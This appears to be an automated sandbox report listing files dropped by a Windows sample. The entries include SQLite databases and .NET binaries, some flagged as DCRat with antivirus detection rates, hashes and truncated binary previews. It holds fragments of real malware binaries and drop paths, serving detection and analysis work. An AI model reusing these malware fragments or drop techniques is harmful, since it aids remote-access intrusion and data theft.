                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8439810553697228
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8439810553697228
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):98304
                                                            Entropy (8bit):0.08235737944063153
                                                            Encrypted:false
                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8439810553697228
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\KyC6hVwU8Z.exe
                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18944
                                                            Entropy (8bit):5.181595394449682
                                                            Encrypted:false
                                                            SSDEEP:384:abquDyuX3PMD1A77ciNqC/Elsrl+0+/QlDIINvB0WLFW:gquuuHPMDinDY9al+0WQFNvBZ
                                                            MD5:F3EDFF85DE5FD002692D54A04BCB1C09
                                                            SHA1:4C844C5B0EE7CB230C9C28290D079143E00CB216
                                                            SHA-256:CAF29650446DB3842E1C1E8E5E1BAFADAF90FC82C5C37B9E2C75A089B7476131
                                                            SHA-512:531D920E2567F58E8169AFC786637C1A0F7B9B5C27B27B5F0EDDBFC3E00CECD7BEA597E34061D836647C5F8C7757F2FE02952A9793344E21B39DDD4BF7985F9D
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~@..:!o.:!o.:!o.3Y...!o..Jj.;!o..Jl.9!o..Jk.(!o.:!n.z!o..Jn.9!o..Jg.8!o..J..;!o..Jm.;!o.Rich:!o.........PE..d...h.6;.........."......"...*.......(.........@.....................................`....`.......... .......................................H...............p.................. ...`D..T............................@..............(A...............................text...0 .......".................. ..`.rdata..~....@.......&..............@..@.data........`.......<..............@....pdata.......p.......>..............@..@.rsrc................@..............@..@.reloc.. ............H..............@..B........................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\KyC6hVwU8Z.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):691200
                                                            Entropy (8bit):5.5554988350478975
                                                            Encrypted:false
                                                            SSDEEP:12288:C9X1yJ7/pZY7fiCI/YBfULiXPrQfkXmm1RhdLB9XFy+nM6D+:CVc7EaCQYBfcE1ZM6D+
                                                            MD5:314420BAC969BCFB9510A0E8CC3686D6
                                                            SHA1:66F1D0A60A2727970476A105C88883F37270E30F
                                                            SHA-256:38B9CC3CCAE02C270E3D62E62E3B3B40E90AD7F898372B8A5035445BA32F4B26
                                                            SHA-512:DEBF908ADD95AA0849451AEF830E5E71724247D352DCB5DAD6B02DCA0D54E4E915A9430DE80D970A4E7EF3749EB2FC7C6FA7839348D84F546D5934D713E7569C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 74%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. ..............................R.....@.....................................S.......p............................................................................ ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc..............................@..B.......................H.......T...d...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):69632
                                                            Entropy (8bit):5.932541123129161
                                                            Encrypted:false
                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                            Process:C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):69632
                                                            Entropy (8bit):5.932541123129161
                                                            Encrypted:false
                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):85504
                                                            Entropy (8bit):5.8769270258874755
                                                            Encrypted:false
                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                            Process:C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):85504
                                                            Entropy (8bit):5.8769270258874755
                                                            Encrypted:false
                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                            Process:C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):691200
                                                            Entropy (8bit):5.5554988350478975
                                                            Encrypted:false
                                                            SSDEEP:12288:C9X1yJ7/pZY7fiCI/YBfULiXPrQfkXmm1RhdLB9XFy+nM6D+:CVc7EaCQYBfcE1ZM6D+
                                                            MD5:314420BAC969BCFB9510A0E8CC3686D6
                                                            SHA1:66F1D0A60A2727970476A105C88883F37270E30F
                                                            SHA-256:38B9CC3CCAE02C270E3D62E62E3B3B40E90AD7F898372B8A5035445BA32F4B26
                                                            SHA-512:DEBF908ADD95AA0849451AEF830E5E71724247D352DCB5DAD6B02DCA0D54E4E915A9430DE80D970A4E7EF3749EB2FC7C6FA7839348D84F546D5934D713E7569C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 74%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. ..............................R.....@.....................................S.......p............................................................................ ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc..............................@..B.......................H.......T...d...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                            Process:C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe
                                                            File Type:ASCII text, with very long lines (624), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):624
                                                            Entropy (8bit):5.90562234864637
                                                            Encrypted:false
                                                            SSDEEP:12:ejQHFcDVYWTNQx45BIYLgIhnEPUx3btwBFgNZO5ph5YfF3s63nX:e0HFcJYp4/BgNPopiFgZqDms63X
                                                            MD5:2993CB98AFCEFF3EDDB272A6754326C0
                                                            SHA1:AAF34A8E501DD4BB83B7FF125ADDC04EDAC25083
                                                            SHA-256:59138F473D2607D463018FC30A1CF38941B483B724B31CBE6A725E27BE59A038
                                                            SHA-512:A51120BA33B2957CC92874C974D4DEF19BAD83656208FC73A3B010FFEC7983144981756163B7B50CED33EF3D6B53D9F557760891BA8C9717C59201BA693A2AA9
                                                            Malicious:false
